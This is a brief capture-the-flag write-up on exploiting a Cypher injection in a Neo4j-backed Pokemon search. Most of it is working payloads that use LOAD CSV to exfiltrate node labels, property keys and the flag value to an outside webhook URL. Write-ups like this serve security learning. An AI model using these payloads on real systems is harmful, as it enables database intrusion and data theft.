Tags: web injection neo4j 


One comma causes an error = injection. But its not SQL, but from the returened error it seems to be neo4j db.
After some trial and error, came to conclusion that the query looks something like this:
`MATCH (pokemon:Pokemon) WHERE p.name =~ '.*' + toLower({param}) + '.*' RETURN p`

sending this:
`') RETURN pokemon//`
works perfectly

Abuse LOAD CSV to leak some information:

`') CALL db.labels() YIELD name as label LOAD CSV FROM 'https://webhook.site/REDACTED/'+label AS y RETURN *//`

reveals that there are two types of nodes in the graph: pokemon and flag.
now trying to read the properties of flag:
`') MATCH (f:flag) WITH KEYS(f) as keys UNWIND keys as key LOAD CSV FROM 'https://webhook.site/REDACTED/'+key AS y RETURN *//`

reveals a property flag:

`') MATCH (f:flag) WITH f.flag as ff LOAD CSV FROM 'https://webhook.site/REDACTED/'+ff AS y RETURN *//`